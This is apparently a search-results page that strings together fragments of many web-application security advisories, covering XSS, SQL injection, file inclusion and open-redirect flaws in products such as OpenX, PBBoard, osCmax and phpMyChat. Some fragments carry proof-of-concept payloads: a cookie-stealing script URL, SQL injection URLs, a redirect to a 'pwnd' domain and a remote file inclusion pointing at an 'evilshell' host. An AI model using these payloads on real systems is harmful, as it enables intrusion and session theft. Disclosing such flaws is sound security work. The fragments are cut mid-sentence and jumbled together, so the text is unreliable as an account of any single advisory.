Next Page >>
parameter
and existing customers all over the world.
3. VULNERABILITY DESCRIPTION
Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
###############################################################################
1. Local File Inclusion in "maincore.php"
###############################################################################
Reason: insufficient sanitization of user-supplied data
Attack vector: user-supplied POST parameter "user_theme"
Preconditions:
1. Logged in as valid user
2. "Allow users to change theme" option must be activated (it is by default)
3. PHP must be < 5.3.4 for null-byte attacks to work
2004.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
Multiple vulnerabilities have been discovered in OpenX, which can be
exploited by malicious people to conduct cross-site scripting,
cross-site request forgery, and file inclusion attacks and by
malicious users to conduct script insertion and SQL injection attacks.
1) Input passed to the "clientid" parameter in "www/admin/banner-
acl.php", "www/admin/banner-edit.php", "www/admin/campaign-zone.php",
"www/admin/advertiser-campaigns.php", "www/admin/campaign-
banners.php", and "www/admin/banner-activate.php" is not properly
sanitised before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
http://[host]/portal/kb.php?start=SQL_CODE_HERE
###############################################################################
2. SQL Injection Vulnerability in "documenthandler.php"
###############################################################################
Reasons: Insufficient sanitization of user-supplied data
Attack vectors: User-supplied POST parameter "prefix"
Preconditions: Logged in as admin with FoxyPress product editing privileges
Php script "documenthandler.php" line 14:
------------------------[ source code start ]----------------------------------
and existing customers all over the world.
3. VULNERABILITY DESCRIPTION
Multiple parameters are not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
Type of vulnerability: Cross-Site Scripting (XSS) - Reflected
Exploit Vectors: Local and Remote
Vulnerability Description: The Web application management interface of Server Monitor contains multiple injection points, which allow for execution of Cross-site Scripting (XSS) attacks. Arbitrary client side code such as JavaScript can be included into certain parameters throughout the Web application. The following parameters and Web pages have been tested and verified; however, it is likely more views and parameters within the application are vulnerable:
event-history.asp (siteid, type) parameter
admin-history.asp (siteid, type) parameters
dashboard-view.asp (siteid, id) parameters
device-events.asp (siteid, dn) parameters
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in PBBoard, which can be exploited to perform SQL injection attacks, change password of arbitrary user and create arbitrary files in folder of the vulnerable application.
1) Multiple SQL Injections in PBBoard: CVE-2012-4034
1.1 Input passed via the "username" POST parameter to /index.php (when "id", "member" and "start" parameters are set, and "page" is set to "send") is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC (Proof of Concept) demonstrates the vulnerability:
1. Sql Injection vulnerability in "account-inbox.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Reasons:
1. unsanitized user submitted parameter "origmsg" is used in sql query
Preconditions:
1. attacker must be logged in as valid user
Test:
Spring Security 2.0.0 t0 2.0.5
Acegi Security 1.0.0 to 1.0.7
Description:
Spring Security does not consider URL path parameters when processing security constraints. By adding an URL path parameter to a request, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification (see below). Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. The unexpected presence of path parameters can cause a constraint to be bypassed.
Users of Apache Tomcat (all current versions) are not affected by this vulnerability since Tomcat follows the guidance previously provided by the Servlet Expert group and strips path parameters from the value returned by getContextPath(), getServletPath() and getPathInfo().
Users of SpringSource tc Server (all versions) are not affected. tc Server uses Apache Tomcat and does not change the handling of path parameters.
Overview:
Various URL's within the deployed OpenCms application version 7.5.0 are
open to attacks, including Cross-Site Scripting, Phishing Through Frames
and Application Error. Some of these attacks allow injection of scripts
into a parameter in the request. The application should filter out such
hazardous characters from user input.
Example follows:
Vulnerable URL (from the OpenCms VFS):
/opencms/opencms/system/modules/org.opencms.workplace.help/jsptemplates/
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in N-13 News, which can be exploited to perform cross-site scripting attacks.
1) Input passed via the GET "id" parameter to index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC code is available:
http://[host]/index.php?id=%3C/script%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
###############################################################################
Reasons:
1. Insecure use of "parse_str()"
2. Uninitialized variable "$mainXML"
Attack vector: User-supplied POST parameters "settingsXML" and "mainXML"
Precondition: Logged in as admin with "FlAG Change skin" privileges
Php script "admin/skin_options.php" line:
------------------------[ source code start ]----------------------------------
III. ANALYSIS
Summary:
A) XSS Vulnerabilities
graph.php (view_type parameter)
graph_view.php (filter parameter)
index.php/login (action parameter)
index.php/login (login_username parmeter)
B) Path Disclosure Vulnerabilities
graph.php (local_graph_id parameter)
for instant messaging to intelligently link people together.
3. VULNERABILITY DESCRIPTION
Multiple parameters were not properly sanitized, which allows attacker
to conduct Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.
"CubeCart is a fully featured ecommerce shopping cart solution used by
over a million store owners around the world."
The following web vulnerabilities were found in CubeCart version 4.3.3;
1.SQL injection in “/cubecart_4/index.php”, parameter “searchStr”.
2.Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “amount”.
3.Cross-site Scripting vulnerability in
“/cubecart_4/modules/gateway/WorldPay/return.php”, parameter “cartId”.
4.Cross-site Scripting vulnerability in
which can be exploited by malicious users to manipulate certain data,
conduct spoofing, SQL injection, and script insertion attacks and by
malicious people to conduct SQL injection and script insertion
attacks.
1) Input passed via the "login" parameter to index.php is not properly
sanitised before being used in an SQL query. This can be exploited to
manipulate SQL queries by injecting arbitrary SQL code.
2) Input passed via the "login" and "password" parameters to index.php
is not properly sanitised before being displayed to the user. This can
Vulnerability Variant:
------------------
Injection "/home-f.asp","/opinions-f.asp" in "sitebid" parameter.
http://www.example.com/src=www.example.com/home-f.asp?sitebid=@@version
http://www.example.com/src=www.example.com/home-f.asp?sitebid=JyI%3D
http://www.example.com/src=www.example.com/home-f.asp?sitebid=%00
High-Tech Bridge Security Research Lab has discovered multiple Cross-Site Scripting (XSS) vulnerabilities in Kajona.
1) Multiple Cross-Site Scripting (XSS) in Kajona: CVE-2012-3805
1.1 Input passed via the "absender_name", "absender_email" and "absender_nachricht" GET parameters to /index.php (when "page" is set to "contact") is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrate the vulnerabilities:
EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1
============ Vulnerability Overview: ============
* URL Redirection:
Parameter: submit-url and wlan_url
http://192.168.178.175/goform/formWirelessTbl?submit-url=http://www.google.de
http://192.168.178.175/goform/formWlanSetup?apMode=0&band=2&ssid=test&chan=11&macAddrValue=5C260A2BF03F&wlanMacClone=0&wlanMac=000000000000&autoMacClone=no&repeaterSSID=&wlLinkMac1=000000000000&wlLinkMac2=000000000000&wlLinkMac3=000000000000&wlLinkMac4=000000000000&wlLinkMac5=000000000000&wlLinkMac6=000000000000&x=57&y=20&wlan-url=http://www.pwnd.pwnd
###############################################################################
Reason:
1. insufficient sanitization of user data before using in preg_replace
Attack vectors:
1. user-supplied parameters "from_prefix" and "to_prefix"
Preconditions:
1. logged in as valid PMA user
2. PHP version < 5.4.7 (Newer versions: Warning: preg_replace(): Null byte in regex)
PMA security advisory: PMASA-2013-2
<param name="itemid" value="860;941" />
<param name="language" value="" />
<param name="os" value="" />
</object>
The Service-URL parameter specifies the URL from which additional
configuration parameters are obtained, including the URL from which the
executable can be obtained. The other parameters are appended to this
URL and are used to supply additional information about the product that
has to be downloaded. The language and os parameters are automatically
set by the ActiveX control if they are not provided. The parameter
| Remote File Inclusion: |
----------------------------
http://localhost/path_to_phpMychat/chat/users_popupL.php3
Parameter = From
POC = http://localhost/path_to_phpMychat/chat/users_popupL.php3?From=http://evilshell
2.1.1. Exploit:
Check the exploit section.
2.2. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site info., such as admin email address.
2.2.1. Exploit:
Check the exploit section.
2.3. Insecure Direct Object Reference [in "bs_login.asp"]. Everyone can edit all the site design. (Also, all the site settings can be changed by other parameters)
2.3.1. Exploit:
Check the exploit section.
2.4. Failure to Restrict URL Access [in "mailPage.asp"]. Everyone can mailbomb others.
2.4.1. Exploit:
Check the exploit section.
[+] Introduction
Pandora FMS (for Pandora Flexible Monitoring System) is a software
solution for monitoring computer networks. It allows monitoring in a
visual way the status and performance of several parameters from
different operating systems, servers, applications and hardware systems
such as firewalls, proxies, databases, web servers or routers.
It can be deployed in almost any operating system. It features remote
monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use
###############################################################################
1. Local File Inclusion in "action.php"
###############################################################################
Reason: using unsanitized user submitted data for file operations
Attack vector: user submitted GET parameter "route"
Preconditions:
1. Windows platform
2. PHP version must be < 5.3.4 for null-byte attacks to work
Result: remote file disclosure, php remote code execution
Affected Versions
------------------------------------------------------------
Each vulnerability was confirmed in versions 2.4.103 and 2.5.139-beta.
The Cross Site Scripting vulnerability affecting the redirect
parameter is only found in version 2.5.139-beta.
Proof of Concept
####################
ACADEMIC WEB TOOLS (AWT) yektaweb is a Persian content management system (CMS) which can manage university conferences and journals too.
####################
2. Vulnerabilities:
####################
2.1. Directory Traversal in "/download.php" in "dfile" parameter.
2.1.1. Exploit:
Check the exploit/POC section.
2.2. Injection Flaws. SQL Injection in "/rating.php" in "book_id" parameter.
2.2.1. Exploit:
Check the exploit/POC section.
Next Page>>
|
